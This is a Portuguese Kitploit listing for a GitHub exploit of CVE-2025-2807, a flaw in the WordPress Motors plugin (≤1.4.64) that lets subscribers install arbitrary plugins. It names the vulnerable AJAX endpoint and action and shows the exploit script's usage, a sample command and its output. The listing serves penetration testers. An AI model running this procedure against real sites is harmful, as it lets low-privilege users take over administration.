Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-2807 — Wordpress - Motors Plugin <= 1.4.64 - Vulnerabilidade de Instalação Arbitrária de Plugin | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-2807
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubnxploited/cve-2025-2807

CVE-2025-2807

Wordpress - Motors Plugin <= 1.4.64 - Vulnerabilidade de Instalação Arbitrária de Plugin

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-2807: Plugin Motors <= 1.4.64 - Vulnerabilidade de Instalação Arbitrária de Plugin

Explorado por: Nxploited | Khaled Alenazi


⚠️ Resumo da Vulnerabilidade

Plugin: Motors (<= 1.4.64)
Tipo: Falta de Autorização para Usuário Autenticado (Assinante+) Instalação Arbitrária de Plugin
Severidade: 8.8 (CVSS v3)
Descoberto em: 07 de Abril de 2025
VDP: Não


🔥 Impacto do Exploit

Esta vulnerabilidade permite que qualquer usuário autenticado do WordPress (Assinante+) instale plugins arbitrários sem qualquer verificação de autorização adequada.

Devido à falta de validação de capacidade na função mvl_setup_wizard_install_plugin, um usuário com privilégios baixos pode realizar ações reservadas a administradores.

📅 Espera-se que seja explorado em massa devido à sua simplicidade e impacto crítico.


🚫 Detalhes Técnicos

  • Endpoint Vulnerável: /wp-admin/admin-ajax.php
  • Ação Vulnerável: mvl_setup_wizard_install_plugin
  • Nível de Acesso Necessário: Assinante+ (usuário logado)
  • Problema Central: Falta da verificação de capacidade current_user_can('install_plugins') ou similar

🚀 Script de Exploit (Python)

Este script:

  1. Faz login como assinante
  2. Extrai o nonce necessário (do HTML ou JS)
  3. Dispara a chamada AJAX vulnerável para instalar um plugin de sua escolha

📃 Uso

root@kitploit:~
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]

Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME     Subscriber username
  -p, --password PASSWORD      Subscriber password
  -pn, --plugin PLUGIN         Plugin to install (default: contact-form-7)

🐞 Exemplo de Execução

root@kitploit:~
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7

Saída:

root@kitploit:~
[*] Logging in...
[+] Logged in successfully.
[*] Fetching setup wizard page...
[+] Found nonce in HTML: 428cdf8347
[*] Attempting to install plugin: contact-form-7
[+] Plugin installation request sent successfully!
[+] Response: {"success":true,"data":"Plugin succesfully activated"}


✨ Exploit por Nxploited (Khaled Alenazi)

Baixar ferramenta